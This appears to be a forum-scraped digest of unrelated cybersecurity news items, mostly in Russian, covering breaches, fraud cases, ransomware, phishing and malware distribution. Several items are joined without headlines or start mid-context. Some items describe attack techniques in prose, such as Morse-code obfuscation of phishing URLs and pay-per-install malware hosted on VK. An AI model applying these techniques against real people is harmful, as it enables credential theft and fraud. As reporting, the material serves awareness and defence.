Документ завершается списком рекомендаций для лабораторий, занимающихся извлечением данных. В частности, советуется изолировать устройства в состоянии AFU от возможного контакта с iPhone на iOS 18. Лабораториям также рекомендуется провести инвентаризацию уже имеющихся устройств и проверить, не произошла ли неожиданная перезагрузка и утрата состояния AFU.
С выходом новой версии iOS 18 компания Apple сделала очередной шаг в борьбе с рынком подержанных запчастей от украденных устройств. Теперь функция блокировки активации распространяется не только на сам iPhone, но и на его основные компоненты, такие как батарея, камеры и дисплей. Это нововведение направлено на предотвращение перепродажи украденных деталей и обеспечивает дополнительную защиту пользователям.
404media.co/police-freak-out-at-iphones-mysteriously-rebooting-themselves- locking-cops-out
Четверо бывших сотрудников криптовалютной биржи Huobi внедрили трояны в клиентские кошельки и похитили в совокупности более 40 000 сид-фраз и приватных ключей. Об этом сообщил журналист Колин Ву.
Согласно материалам дела, в начале марта 2023 года трое фигурантов Чжан, Дун и Лю решили добавить программу бэкдора в ПО кошелька. Таким образом они получили доступ к более чем 19 000 криптовалютным адресам.
Конкретная сумма украденных активов не разглашается.
В апреле 2024 года суд приговорил Лю, Чжана и Дуна к трем годам тюрьмы и штрафу в размере 30 000 юаней (свыше $4000) за незаконное получение данных компьютерных информационных систем.
Позднее следствие вышло на еще одного экс-работника Huobi Чжана Моуи, который также прописал в исходном коде кошелька бэкдор и похитил более 6400 приватных ключей и сид-фраз. Начало его преступной деятельности датируется июлем 2021 года.
Он получил три года тюрьмы и штраф в 50 000 юаней (~$7000).
В расследовании инцидента Huobi сотрудничала с Шанхайским бюро общественной безопасности.
Прокуратура Могилевской области направила в суд уголовные дела в отношении двух местных жителей и гражданина Российской Федерации, которым инкриминировано покушение на хищение имущества путем модификации компьютерной информации. Об этом сообщили в службе информации прокуратуры Могилевской области.
"Как установлено во время предварительного расследования, обвиняемые в мае - июле 2020 года зарегистрировали юридическое лицо, которое якобы намеревалось оказывать туристические услуги. Находясь на территории другого государства, они приобрели в интернете реквизиты платежных карт иностранных граждан. Затем начали вносить ложную информацию в компьютерную систему банковского учреждения, с которым у юридического лица был заключен договор", - рассказали в прокуратуре.
В результате таких действий в банк поступила информация о якобы имевшем место использовании платежных карт их законными держателями при оплате услуг организации. Обвиняемые пытались похитить свыше Br175 тыс., однако фактически завладели Br117 тыс., поскольку в определенный момент банк заблокировал операции по счету фиктивной организации.
"При изучении материалов дела в прокуратуре Могилевской области пришли к выводу об обоснованности обвинения и объективном исследовании обстоятельств преступлений. Согласились с квалификацией действий обвиняемых по ч.1 ст.14 и ч.4 ст.212 УК", - отметили в службе информации.
Одному из обвиняемых также инкриминирован ряд хищений, в том числе путем обмана, например при получении субсидии, попытке получения Br200 тыс. кредита с представлением для этих целей поддельных документов, что дополнительно квалифицировано по ч.2 ст.209, ч.1 ст.14 и ч.4 ст.209, ч.2 ст.380, ч.2 ст.205 УК.
Ранее избранную в отношении двух обвиняемых меру пресечения прокурор, направляя дело в суд, оставил прежней - заключение под стражу, в отношении третьего обвиняемого применено личное поручительство.
17 марта в свободный доступ попал полный SQL-дамп базы данных социальной сети Atlayo, содержащий в том числе 95 биткоин-адресов пользователей. Об этом сообщает Telegram-канал «Утечки информации».
По предположению источника, это резервная копия, созданная 10 марта 2020 года.
Помимо привязанных к пользователям биткоин-кошельков, в таблице содержатся 29 328 строк с именами, адресами электронной почты, датой рождения, указанием страны, хешированных паролей, датами регистрации и последней активности с 23 апреля 2017 года по 28 августа 2019 года.
Также в дампе находятся таблицы с 114 298 приватными сообщениями пользователей в кодировке Base64.
Летом 2020 года полиция Чехии изъяла сервер соцсети Atlayo, располагавшейся в onion-сегменте сети. Против платформы завели дело по ордеру полиции Дании в связи с операциями по продаже наркотиков.
Atlayo позиционировалась как «Facebook для даркнета» и утверждалось, что в этой соцсети соблюдается анонимность и свобода слова.
South Korean crypto exchange Gdac was hacked for nearly $13 million on Sunday, the firm said on Monday.
Hackers transferred nearly $13 million worth of crypto, 23% of its total custodial assets, from Gdac's [hot wallet](https://www.coindesk.com/learn/hot- vs-cold-crypto-storage-what-are-the-differences/) to an unidentified wallet.
The hackers stole nearly 61 bitcoins (BTC), 350.5 ether (ETH), 10 million wemix tokens (WEMIX) and 220,000 USDT. Gdac said it has notified the authorities about the hack and is working to recover the funds.
Crypto platforms have suffered some notable hacks and exploits in the past 15 to 18 months. The largest was [Axie Infinity's Ronin bridge](https://www.coindesk.com/tech/2022/03/29/axie-infinitys-ronin-network- suffers-625m-exploit/), which suffered a $625 million hack last year. On Sunday, decentralized-finance protocol Sushi [was exploited](https://www.coindesk.com/tech/2023/04/09/sushi- dex-approval-contract-exploited-for-33m/) for $3.3 million.
Source: [CoinDesk](https://www.coindesk.com/tech/2023/04/10/s-korean-crypto- exchange-gdac-hacked-for-nearly-13m/)
Разоблачили правонарушителей сотрудники управления противодействия киберпреступлениям совместно со следователями Криворожского районного управления полиции.
Двое местных жителей 19-22 лет нашли уязвимость во внутренней системе банковского учреждения. Таким образом, юноши несанкционированно получили доступ к базе с персональными данными более 100 тысяч клиентов банка. В частности, там содержались фотографии граждан с паспортами, их анкеты, где указывались сведения о месте работы, адрес проживания и т.д., а также данные о банковских счетах.
За нераспространение похищенной базы данных фигуранты требовали от банка "выкуп" в размере 100 тысяч гривен.
В домах злоумышленников правоохранители провели обыски и изъяли компьютерную технику, на которой хранились похищенные сведения, а также мобильные телефоны, банковские карточки и "черновые" записи. Изъятое направлено на проведение экспертиз.
Уголовное производство открыто по ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Санкция статьи предусматривает наказание в виде лишения свободы на срок от трех до восьми лет. Досудебное расследование продолжается.
Процессуальное руководство осуществляет Криворожская центральная окружная прокуратура.
инициативу поддержали в Госдуме и ФСБ
Причина: разработчиков из Ookla обвиняют в сотрудничестве со спецслужбами США, которые создали систему тестового контроля сетей связи.
По мнению Международной академии связи, данные из этих сетей могут использовать спецслужбы, к примеру, для организации DDoS-атак.
В мессенджере Zangi обнаружили критическую уязвимость, дающую возможность получить доступ к перепискам пользователей. Пользователям настоятельно рекомендуют сменить мессенджер.
«Убийца» Telegram под угрозой
В популярном мессенджере Zangi нашли серьезную уязвимость из-за которой мессенджером пользоваться опасно для личных данных пользователей. Об этом CNews сообщили представители отечественной компании-разработчика решений информационной безопасности Usergate.
Zangi — армянский разработчик одноименного мессенджера, который, по утверждению компании, обеспечивает голосовую и видеосвязь с минимальными затратами трафика в мире. Мессенджер позиционирует себя как безопасная альтернатива Telegram, и по данным Google Play, приложение имеет более 10 млн загрузок.
В ходе исследования эксперты UserGate обнаружили критическую уязвимость, которая дает злоумышленникам возможность расшифровать сообщения в групповых чатах, а также групповые и личные звонки. Это означает, что злоумышленники могут получить доступ к содержимому переписки.
Данная проблема касается как групповых чатов, так и голосовых звонков, что ставит под угрозу конфиденциальность пользователей.
Пока уязвимость не устранена, пользователям рекомендуют сменить мессенджер.
Подробности уязвимости
Лица, имеющие доступ к трафику между приложением и его серверами, могут получить доступ к переписке и телефонных звонков, что создает угрозу для личной и корпоративной безопасности.
На вопрос о том, как злоумышленники могут воспользоваться этой уязвимостью, главный специалист по информационной безопасности и руководителя центра мониторинга и реагирования UserGate Дмитрий Кузеванов ответил, что у них есть возможность получить доступ к содержимому переписки и звонков, что угрожает личным данным пользователей и ставит под угрозу безопасность всей информационной системы мессенджера.
«Мы даважды обращались к разработчику, отправляли результаты исследования, но, к сожалению, ответа не получили», — подчеркнул Кузеванов. На данный момент эксперты UserGate внесли данные об уязвимости в базу данных БДУ ФСТЭК и настоятельно рекомендуют воздержаться от использования мессенджера до устранения проблемы, которая может быть уязвимостью для личных и служебных данных.
Подробную работу уязвимости в компании не раскрыли, чтобы не подвергать пользователей дополнительному риску со стороны тех, кто может использовать технические детали для ее эксплуатации. UserGate будет ждать ответа в течение 90 дней, прежде чем расскажет подробности.
«При отсутствии ответа или после устранения уязвимости мы сможем предоставить технические детали и опубликовать наш отчет», — заключил Кузеванов. Однако, до тех пор пользователи Zangi должны быть особенно внимательными и рассмотреть альтернативные варианты общения, чтобы избежать потенциальной утечки личной информации.
Что касается рекомендаций для пользователей, которые все еще используют Zangi, Кузеванов был однозначен: «Единственная рекомендация — сменить мессенджер до устранения уязвимости».
Двое мужчин получили свободный доступ к курорту, но что-то пошло не так.
В центре событий оказались два хакера, которые в апреле этого года обеспечили себе и всем желающим беспрепятственный доступ к пляжам популярного курорта «Солёные озера» в Соль-Илецке. Собственник курорта в результате понес существенные убытки, в размере 168 900 рублей. Несколько часов, благодаря незаконной деятельности хакеров, отдых был абсолютно бесплатным.
Первый злоумышленник, заручившись фотографиями 15 электронных билетов, каждый из которых стоил 300 рублей, передал их своему соучастнику — специалисту в области информационных технологий. Он, в свою очередь, нарушив протоколы защиты, несанкционированно внедрился в систему пропусков, внес в нее изменения, которые сделали проход бесплатным.
Как подтвердили в пресс-службе Соль-Илецкого городского суда, уголовное дело сразу же было направлено им, но вопрос о его производстве несколько месяцев оставался открытым.
Вчера, 10 июля, Соль-Илецкий районный суд вынес свой вердикт. ИТ-эксперт и его соучастник, признав вину и выразив раскаяние, были осуждены. Первый получил штраф в размере 150 тысяч рублей, второго приговорили к одному году ограничения свободы с учетом рецидива. Вердикт еще не вступил в силу, но ущерб в 168 900 рублей, нанесенный курорту, подсудимые уже компенсировали.
source: sol-iletsky.orb.sudrf.ru/modules.php?name=press_dep&op=1&did=2478
Разработчики анонимной сети Tor представили проект Arti, в рамках которого ведётся работа по созданию реализации протокола Tor на языке Rust. В отличие от реализации на Си, которая вначале была спроектирована как SOCKS-прокси, а уже потом подогнана под другие потребности, Arti изначально развивается в форме модульной встраиваемой библиотеки, которую смогут использовать различные приложения. Работа ведётся уже более года с финансированием по программе грантов Zcash Open Major Grants (ZOMG). Код распространяется под лицензиями Apache 2.0 и MIT.
В качестве причин переписывания Tor на Rust называется желание добиться более высокого уровня защищённости кода за счёт использования языка, обеспечивающего безопасную работу с памятью. По оценке разработчиков Tor, как минимум половина всех отслеживаемых проектом уязвимостей будет исключена в реализации на Rust, если в коде не используются блоки "unsafe". Rust также даст возможность добиться более высокой скорости разработки, чем при использовании Си, за счёт выразительности языка и строгих гарантий, позволяющих не тратить время на двойные проверки и написание лишнего кода. Кроме того, при разработке нового проекта учитывается весь прошлый опыт разработки Tor, что позволит избежать известных архитектурных проблем, сделать проект более модульным и эффективным.
В текущем состоянии Arti уже может подключаться к сети Tor, обеспечивать взаимодействие с серверами директорий и создавать анонимизированные соединения поверх Tor с предоставлением прокси на основе протокола SOCKS. Разработку пока не рекомендуется использовать в рабочих системах, так как не все возможности по обеспечению конфиденциальности реализованы и не гарантируется обратная совместимость на уровне API. Первую версию клиента, соответствующую критериям безопасности, поддерживающую сторожевые узлы и изоляцию потоков, планируется выпустить в октябре.
В марте 2022 года ожидается первый бета-выпуск с экспериментальной реализацией встраиваемой библиотеки и оптимизациями производительности. Первый стабильный релиз, со стабильным API, CLI и форматом конфигурации, а также с проведением аудита, запланирован на середину сентября 2022 года. Данный выпуск будет пригоден для начального использования обычными пользователями. В конце октября 2022 года ожидается обновление 1.1 с поддержкой подключаемого транспорта и бриджей для обхода блокировок. Поддержка onion-сервисов намечена на выпуск 1.2, а достижение паритета с клиентом на языке Си ожидается в выпуске 2.0, сроки для которых пока не определены.
В дальнейшем разработчики прогнозируют постепенное уменьшение активности, связанной с разработкой кода на Си, и увеличение времени, уделяемого редакции на Rust. Когда реализация на Rust достигнет уровня, способного заменить вариант на Си, разработчики прекратят добавление новых возможностей в реализацию на Си и через какое-то время полностью прекратят её поддержку. Но это наступит не скоро, и пока реализация на Rust не достигнет уровня полноценной замены разработка клиента и релея Tor на Си будет продолжена.
A new targeted phishing campaign includes the novel obfuscation technique of using Morse code to hide malicious URLs in an email attachment.
Samuel Morse and Alfred Vail invented morse code as a way of transmitting
messages across telegraph wire. When using Morse code, each letter and number
is encoded as a series of dots (short sound) and dashes (long sound).
Starting last week, a threat actor began utilizing Morse code to hide
malicious URLs in their phishing form to bypass secure mail gateways and mail
filters.
BleepingComputer could not find any references to Morse code being used in phishing attacks in the past, making this a novel obfuscation technique
After first learning of this attack from a post on
Reddit,
BleepingComputer was able to find numerous samples of the targeted attack
uploaded to VirusTotal since February 2nd, 2021.
The phishing attack starts with an email pretending to be an invoice for the
company with a mail subject like 'Revenue_payment_invoice February_Wednesday
02/03/2021.'
This email includes an HTML attachment named in such a way as to appear to be
an Excel invoice for the company. These attachments are named in the format
'[company_name]invoice[number]._xlsx.hTML.'
For example, if BleepingComputer was targeted, the attachment would be named
'bleepingcomputer_invoice_1308._xlsx.hTML.'
When viewing the attachment in a text editor, you can see that they include
JavaScript that maps letters and numbers to Morse code. For example, the
letter 'a ' is mapped to '.- ' and the letter 'b ' is mapped to
'-... ',
The script then calls a decodeMorse() function to decode a Morse code string
into a hexadecimal string. This hexadecimal string is further decoded into
JavaScript tags that are injected into the HTML page.
These injected scripts combined with the HTML attachment contain the various
resources necessary to render a fake Excel spreadsheet that states their sign-
in timed out and prompts them to enter their password again.
Once a user enters their password, the form will submit the password to a
remote site where the attackers can collect the login credentials.
This campaign is highly targeted, with the threat actor using the logo.clearbit.comservice to insert logos for the recipient's companies into the login form to make it more convincing. If a logo is not available, it uses the generic Office 365 logo, as shown in the image above.
BleepingComputer has seen eleven companies targeted by this phishing attack, including SGS, Dimensional, Metrohm, SBI (Mauritius) Ltd, NUOVO IMAIE, Bridgestone, Cargeas, ODDO BHF Asset Management, Dea Capital, Equinti, and Capital Four.
Phishing scams are becoming more intricate every day as mail gateways become better at detecting malicious emails.
Due to this, everyone must pay close attention to URLs and attachment names before submitting any information. If something looks at all suspicious, recipients should contact their network administrators to investigate further.
As this phishing email uses attachments with double-extension (xlxs and HTML), it is important to make sure that Windows file extensions are enabled to make it easier to spot suspicious attachments.
Самарский бизнесмен направил своего 43-летнего сотрудника на закупку моркови в Волгоград, выдав ему для этого 3 ляма рублей. Однако из рейса дальнобойщик в назначенное время не вернулся, в результате чего предприниматель обратился в правоохранительные органы.
Как рассказали в УМВД по Волгоградской области, пустая бесхозная фура была обнаружена на обочине дороги в Городищенском районе. Водитель же на рабочем месте отсутствовал. Впоследствии его нашли, что позволило выяснить обстоятельства дела.
Оказалось, что вместо покупки моркови дальнобойщик решил испытать везение в азартных играх, однако удача мужчине не улыбнулась.
«Мне начальник дал 3 млн, чтобы купить морковь. Я проиграл из этих денег 505 тыс. рублей», — рассказал любитель гемблинга.
Click to expand...
— Машину же водитель оставил из-за страха наказания. Впрочем, ответственности избежать ему уже вряд ли удастся — мужчине грозит тюремный срок по статье за мошенничество.
В марте 2022 года исходные коды малвари Conti попали в открытый доступ и теперь, судя по всему, их начинают использовать другие преступники, обратив шифровальщика против российских компаний.
Напомню, что эта история началась еще в феврале 2022 года, когда анонимный ИБ- исследователь, имевший доступ к инфраструктуре хакеров (по другим данным это был украинский участник самой хак-группы), решил отомстить Conti. Дело в том, что группировка объявила, что в свете «специальной военной операции» в Украине полностью поддерживает действия российского правительства.
В итоге сначала в открытый доступ были выложены все внутренние чаты хакеров за последний год (339 файлов JSON, каждый из которых — это лог за отдельно взятый день), а затем была опубликована еще одна порция логов (еще 148 файлов JSON, содержащие 107 000 внутренних сообщений группировки) и другие данные, связанные с Conti, в том числе исходный код панелей управления, API BazarBackdoor, старый исходный код шифровальщика, скриншоты серверов и многое другое. За этими утечками последовала и еще одна, с более свежими исходниками малвари Conti.
Как сообщает теперь издание Bleeping Computer, некая хак-группа NB65 уже адаптировала исходники Conti для своего арсенала и атакует российские организации. По данным издания, NB65 взламывала российские организации весь последний месяц, похищая данные и сливая их в сеть. При этом хакеры заявляли, что атаки связаны со «спецоперацией» в Украине.
К примеру, в марте хак-группа утверждала, что уже скомпрометировала ИТ- компанию «Тензор», Роскосмос и ВГТРК. К примеру, хакеры писали, что похитили у ВГТРК 786,2 Гб данных, включая 900 000 email’ов и 4 000 других файлов, которые в итоге были опубликованы на сайте DDoS Secrets.
Теперь же NB65 перешла к использованию шифровальщиков, создав на базе исходных кодов Conti собственную малварь, образец которой был обнаружен на VirusTotal. Оказалось, что почти все защитные решения определяют эту угрозу как Conti, но Intezer Analyze [подсчитал](https://analyze.intezer.com/analyses/0fea9380-e256-4be1-a7f8-e0589e315d80/sub/b44999fc-035c-486b-9625-a9cdf4473ec2/genetic- summary), что вредонос использует лишь 66% того же кода.
Журналисты, которым удалось пообщаться с хакерами, сообщают, что те создали вредоноса на базе первой утечки исходников Conti, но модифицируют вредоноса для каждой жертвы, чтобы существующие дешифраторы не работали. Также представители NB65 завили изданию, что они поддерживают Украину и будут атаковать российские компании, включая принадлежащие частным лицам, вплоть до прекращения всех боевых действий.
«Мы не станем атаковать цели за пределами России. Такие группы как Conti и Sandworm, наряду с другими российскими APT, годами атакуют Запад с помощью программ-вымогателей, атак на цепочки поставок (SolarWinds, оборонные подрядчики). Мы решили, что пора им испытать это на себе», — заявляют в NB65.
Click to expand...
xakep.ru
Юноша, который активно пользовался инстаграмом, наткнулся на объявление, автор которого предлагал возможность пассивного заработка. Откликнувшись на объявление, подросток узнал, что для этого нужно сообщить номер банковской карточки Приватбанка и данные для управления ей при помощи приложения Приват24.
Мужчина объяснил мальчику, что карточки нужны ему для приема большого количества платежей, которые он не может получать сам из-за ограничений банка. А в качестве вознаграждения за «аренду», он будет оставлять владельцу карточки 10% от оборота.
Прикинув, как к нему рекой потекут халявные денежки, подросток смекнул, что может раздобыть подходящую карту у деда, который не подкован технически во всяких современных технологиях и вряд ли заметит манипуляции с его картой. В силу неопытности, ребенок не заподозрил, что стал завербованным «дропом», в схеме обналичивания денег, полученных преступным путем.
Тем временем, мошенник завел в социальной сети Instagram 5 страниц, посвященных продаже электронных сигарет IQOS и стиков к ним. Запустив рекламу, мошенник стал предлагать заинтересованным модные устройства для курения по цене, вдвое меньше официальной.
Получая запрос в личные сообщения Instagram, мужчина объяснял «клиентам», что работает только по полной предоплате товара. Такие условия он объяснял желанием подстраховаться от рисков: поскольку товар и так достаточно недорогой, то в случае, если покупатель откажется забирать его на Новой Почте, продавец не понесет напрасные расходы на пересылку.
Тем, кто соглашался на условия, мошенник предоставлял реквизиты для оплаты: номер карты ни о чем не подозревающего пенсионера. Таким способом мошенник обманул не менее 18 человек, которые дошли до полиции, чтобы подать заявления. Все они, не получив ожидаемого товара, понесли ущерб в размере от 350 до 1200 гривен.
Получая оплаты на подставную карту, мужчина авторизовался через Приват24 и выводил заработок дальше, оставляя, к радости подростка, обещанную комиссию на счету. Следствие вышло на владельца карты, дедушку ждал неприятный сюрприз: ведь часть преступных денег осела на его счету, а то и была уже потрачена. Семейству пришлось доказывать в суде, что сдавая в аренду чужую карту, нерадивый внук не был в курсе мошеннической схемы и не имел умысла принимать в ней участие.
Решением суда, торговец несуществующими «айкосами» был признан виновным в многократном нарушении ст. 190 УК Украины и приговорен к тюремному заключению на 3 года. Однако, приняв во внимание чистосердечное признание вины и то, что обвиняемый частично возместил нанесенный им ущерб, раздав более 8 тысяч гривен потерпевшим, суд счел возможным отложить исполнение приговора на испытательный срок 1 год.
Один из крупнейших мировых производителей мяса JBS Holdings заплатил $11 млн в BTC вымогателям, 30 мая атаковавшим информационную систему компании, что привело к сбоям в работе.
Пока неизвестно, каким образом хакеры проникли в информационную систему компании. Атака имеет сходство с атакой вируса-вымогателя на Colonial Pipeline, произошедшей 14 мая. Согласно анализу JBS, данные о клиентах, поставщиках или сотрудниках не были скомпрометированы в результате атаки.
По словам генерального директора американского подразделения JBS SA Андре Ногейры (Andre Nogueira), оплата была произведена в попытке смягчить воздействие атаки на бизнес-процессы и партнеров JBS, включая рестораны, продуктовые магазины и фермеров.
«Платить преступникам было неприятно, но мы поступили правильно для наших клиентов», – сказал Ногейра. Глава компании также сказал, что выкуп был выплачен после того, как большинство предприятий JBS заработало.
JBS узнала об атаке 30 мая, когда сотрудники начали замечать проблемы в работе серверов. После получения требования выкупа стало ясно, что JBS имеет дело с хакерами. Вскоре JBS уведомила об этом Федеральное бюро расследований, а технический персонал компании начал закрывать доступ к системам поставщиков мяса, чтобы притормозить продвижение злоумышленников внутри системы.
JBS провела вторичное резервное копирование своих данных, которые были зашифрованы. Компания заплатила выкуп во время процесса восстановления работы из резервных данных, чтобы обезопасить себя от дальнейших атак со стороны REvil.
«Мы решили, что не можем пойти на такой риск и столкнуться с последствиями, если что-то пойдет не так в нашем процессе восстановления», – сказал Ногейра. «Это была страховка для защиты наших клиентов».
In the last 12 hours, all 3 domains have been hijacked and used for MITM and phishing attacks. Please use onion addresses as they are supposedly still safe.
Follow the updates on Twitter dark.fail for more information https://twitter.com/DarkDotFail?ref_src=twsrc^google|twcamp^serp|twgr^author
ENGLISH
Within the past 12 hours all 3 domains have been hijacked and are being used
for MITM attacks and phishing. Please use the onion addresses as they are
supposedly still safe.
Watching dark.fail twitter updates for more infos
https://twitter.com/DarkDotFail?ref_src=twsrc^google|twcamp^serp|twgr^author
Индийская финтех платформа Mobikwik предоставляет финансовые услуги и мобильный платежный шлюз для 120 000 000 пользователей. Услугами этой компании пользуются около 3 000 000 продавцов и поставщиков.
Еще в прошлом месяце ИБ-исследователь Раджшекхар Раджахария (Rajshekhar Rajaharia) обнаружил в даркнете дамп, содержащий 8,2 терабайта личных данных, якобы принадлежащих миллионам пользователей Mobikwik. Эта база включает в себя имена, номера телефонов, адреса электронной почты, адреса проживания, данные GPS, хэшированные пароли, список установленных приложений, журналы транзакций, номера банковских счетов и части номера платежных карт для 40 000 000 человек. Продавец оценил базу в 1,2 биткоина, то есть примерно в 70 000 долларов.

Также дамп содержит данные KYC (Know Your Customer) для 3 500 000 человек, то есть копии карт AADHAAR, которые присваиваются гражданам страны системой UIDAI (Unique Identification Authority of India, Агентство Индии по уникальной идентификации) и PAN ID.
Хуже того, выяснилось, что MobiKwik, не удаляет информацию о картах со своих серверов даже после того, как пользователь удалил их, а это нарушение закона.
__https://twitter.com/x/status/1365324943630561281
Хакер, выставивший данные на продажу, даже создал специальный поисковый портал, чтобы любой мог проверить, оказался ли он в числе пострадавших. В настоящее время от идеи столь простого поиска пришлось отказаться из-за большого объема трафика и добавить капчу для блокировки ботов, пытающихся собрать данные.

После публикации исследователя, представители MobiKwik заявили, что никакой утечки данных не было, расследование не выявило никаких нарушений, а Раджахария просто хочет «привлечь внимание прессы». Также в компании добавили, что юристы MobiKwik примут меры «в отношении этого так называемого исследователя, который пытается опорочить репутацию бренда из скрытых побуждений».
«Различные образцы текстовых файлов, которые [исследователь] демонстрировал, ничего не доказывают. Любой может создать такие текстовые файлы, чтобы ложно притеснять любую компанию», — писали представители MobiKwik.
Click to expand...
Такая реакция компания уже вызвала критику со стороны других ИБ-специалистов.
«Никогда, никогда не ведите себя так, как @MobiKwik в этом треде 25 дней назад», — говорит в Twitter основатель сервиса Have I Been Pwned Трой Хант.
Click to expand...
Невзирая на критику, теперь, когда инцидент стал достоянием широкой общественности, в MobiKwik продолжают все отрицать. В новом заявлении компании утверждается, что клиенты, обнаружившие свои данные в даркнете, могли сами загрузить их в сеть:
«Некоторые пользователи сообщили, что их данные можно найти в дарквебе. Пока мы изучаем этот вопрос, но вполне возможно, что любой пользователь мог загрузить свою информацию на несколько платформ. Следовательно, неверно предполагать, что данные, доступные в дарквебе, были получены из сети MobiKwik или любого другого установленного источника».
Click to expand...
Хотя сторонние киберкриминалисты якобы не обнаружили никаких доказательств утечки данных даже после проведения тщательного расследования, в компании обещают привлечь еще экспертов и провести аудит безопасности. Вместе с тем сообщается, что «протоколы безопасности для хранения конфиденциальных данных надежны и не были нарушены».
Источник: xakep.ru/2021/03/31/mobikwik/
Oxfam Australia investigates a suspected data breach after a threat actor claimed to be selling their database belonging on a hacker forum.
Oxfam Australia is a charity focused on alleviating poverty within the
indigenous Australian people and people from Africa, Asia, and the middle
east. The charity is part of a confederation of twenty charities worldwide
operating under the Oxfam umbrella.
Last week, BleepingComputer learned of a threat actor claiming to be selling a
database containing the Oxfam Australia contact and donor information for 1.7
million people.
The database samples seen by BleepingComputer included names, email addresses,
addresses, phone numbers, and donation amounts.
BleepingComputer has confirmed that one of the records contains legitimate
data for a donor from sample data shared by the threat actor.
When BleepingComputer learned about this sale, we contacted Oxfam Australia, who immediately stated that they were investigating the situation.
Today, Oxfam Australia told BleepingComputer that they continue to investigate the breach and reported it to the Australian Cyber Security Centre (ACSC) and the Office of the Australian Information Commissioner (OAIC).
"Late last week, Oxfam Australia was alerted to a suspected data incident. Oxfam immediately launched an investigation and engaged market leading experts to assist in identifying whether data may have been accessed and any impact on its supporters."
"Chief Executive Lyn Morgain said Oxfam Australia had reported the matter to the Australian Cyber Security Centre (ACSC) and the Office of the Australian Information Commissioner (OAIC) while continuing to investigate the suspected incident," disclosed their [suspected data incident notification](https://media.oxfam.org.au/2021/02/oxfam-australia- investigating-suspected-data-incident/).
Oxfam Australia has told BleepingComputer that it is unknown what data was potentially accessed and how many people were affected.
The charity is investigating the incident and will update its security advisory as more information is known.
PPI-сервисы PrivateLoader и ruzki теперь используют документы VK.com для
распространения вредоносного ПО.
Исследователи кибербезопасности выявили связи между сервисами вредоносных
программ с оплатой за установку (pay-per-install, PPI) PrivateLoader и ruzki.
По данным расследования SEKOIA, PrivateLoader является проприетарным
загрузчиком вредоносного PPI-сервиса ruzki.
Согласно отчету ИБ-компании SEKOIA, PPI-сервис ruzki (также известен как les0k, zhigalsz) рекламирует свою платформу на подпольном русскоязычном форуме Lolz Guru и в своих Telegram-каналах как минимум с мая 2021 года.
PrivateLoader функционирует как загрузчик на основе C++ для загрузки и развертывания дополнительных вредоносных полезных нагрузок на зараженных хостах Windows. В основном он распространяется через SEO-оптимизированные веб- сайты, на которых содержится взломанное ПО.
Некоторые из наиболее распространенных семейств вредоносных программ, распространяемых через PrivateLoader, включают Redline Stealer , Raccoon Stealer , Vidar и другие.
Эксперты SEKOIA заметили новое изменение в кампании, которое заключается в
использовании документов в VK.com для размещения вредоносных полезных нагрузок
(раньше для этого использовался Discord), что мотивировано усиленным
мониторингом сети доставки контента платформы.

По словам SEKOIA злоумышленник ruzki продает пакеты из 1000 установок на
зараженных системах, расположенных по всему миру за $70. В частности, в Европе
за $300 и в США за $1000.
Исследователи связали PrivateLoader с ruzki, исходя из следующих наблюдений:
Специалисты заявили, что услуги с оплатой за установку всегда играли ключевую роль в массовом распространении вредоносного ПО.
В пятницу, Wall Street Journal исследовали компанию Premise Data Corp., которая использует пользователей для выполнения простых задач за небольшие деньги, многие из которых находятся в развивающихся странах. Задания могут варьироваться от фотографирования магазинов конкурентов до подсчёта количества банкоматов в определённой области и отчётности о ценах в магазинах.
Примерно половина клиентов фирмы -- частные компании, которые ищут «коммерческую информацию» (в основном сообщают о деятельности конкурентов). Правительство США, и иностранные правительства наняли фирму для проведения более продвинутых разведывательных работ, при этом оценивая общественное мнение.
Согласно WSJ, приложение Premise является одной из растущего числа компаний, которые преодолевают «разрыв между потребительскими услугами и государственным надзором» полагаясь на распространение мобильных телефонов, как на способ превратить миллиарды устройств в датчики, которые собирают полезную информацию из открытых источников для государственных служб безопасности".
Генеральный директор Premise даже намекнул, что иностранные правительства обратились к компании с просьбой помочь с выработкой политики в отношении того, как бороться с «вакцинной нерешительностью».
«Данные, полученные от наших авторов помогли проинформировать государственных чиновников о том, как лучше всего справиться с вакцинной нерешительностью, восприимчивостью к иностранному вмешательству и дезинформацией на выборах, а также о местонахождении и характере деятельности банд в Гондурасе», - сказал главный исполнительный директор Premise -- Мори Блэкман. Компания отказалась назвать своих клиентов, сославшись на конфиденциальность.
Premise был запущен в 2013 году как инструмент, предназначенный для сбора данных для использования в работе по международному развитию правительствами и неправительственными организациями. Согласно документам и интервью с бывшими сотрудниками, в последние годы она также наладила связи с американским истеблишментом национальной безопасности и подчеркнула свою способность служить инструментом слежки. По состоянию на 2019 год в маркетинговых материалах компании говорится, что у неё 600 тысяч пользователей, работающих в 43 странах, включая такие глобальные горячие точки, как Ирак, Афганистан, Сирия и Йемен.
Федеральные записи показывают, что Premise с 2017 года получила от правительства не менее 5 миллионов долларов по военным проектам, в том числе по контрактам с ВВС и армией и в качестве субподрядчика другим оборонным организациям. Ключевая полезность компании состоит в сборе информации: она использует гражданских пользователей в Афганистане и других местах для нанесения на карту «ключевых социальных структур, таких как мечети, банки и интернет-кафе; а также скрытого мониторинга вышек сотовой связи и сигналов Wi- Fi на площади в 100 - квадратный километров".
В презентации, подготовленной в прошлом году для Объединённой совместной оперативной группы специальных операций Афганистана, Premise поделилась некоторыми подробностями о своей глобальной операции, из которой видно, что в основном компания действует за пределами США.
Компания так же рассказала, как её «пользователи», находящиеся в районе Кабула, помогли собрать ценные данные для вооружённых сил США и Афганистана.
Как пояснили в WSJ, данные сетей Wi-Fi, вышек сотовой связи и мобильных устройств могут оказаться ценными для военных.
Существует также возможность отслеживания мощности сигнала ближайших вышек сотовой связи и точек доступа Wi-Fi благодаря группе пользователей, что может быть полезно при попытке заглушить связь во время военных операций.
Пользователям приложения для сбора данных Premise обычно не сообщают, для кого они собирают информацию. Конечно, всё это изложено в политике конфиденциальности компании. В настоящее время приложение назначает около пяти «задач» в день своим активным пользователям в Афганистане.
WSJ связавшись с афганскими пользователями приложения, удалось узнать, что им обычно платят около 25 центов за задачу (около 20 афгани). И что в последнее время некоторые задачи показались им «потенциально опасными». Premises утверждает, что ни один из пользователей никогда не пострадал при выполнении задач.
Таким образом, многие пользователи приложения фактически используются как невольные шпионы для военных.
В следующий раз, когда вы увидите, как кто-то фотографирует мечеть или банк, помните, что это может быть часть официально санкционированной разведывательной операции.
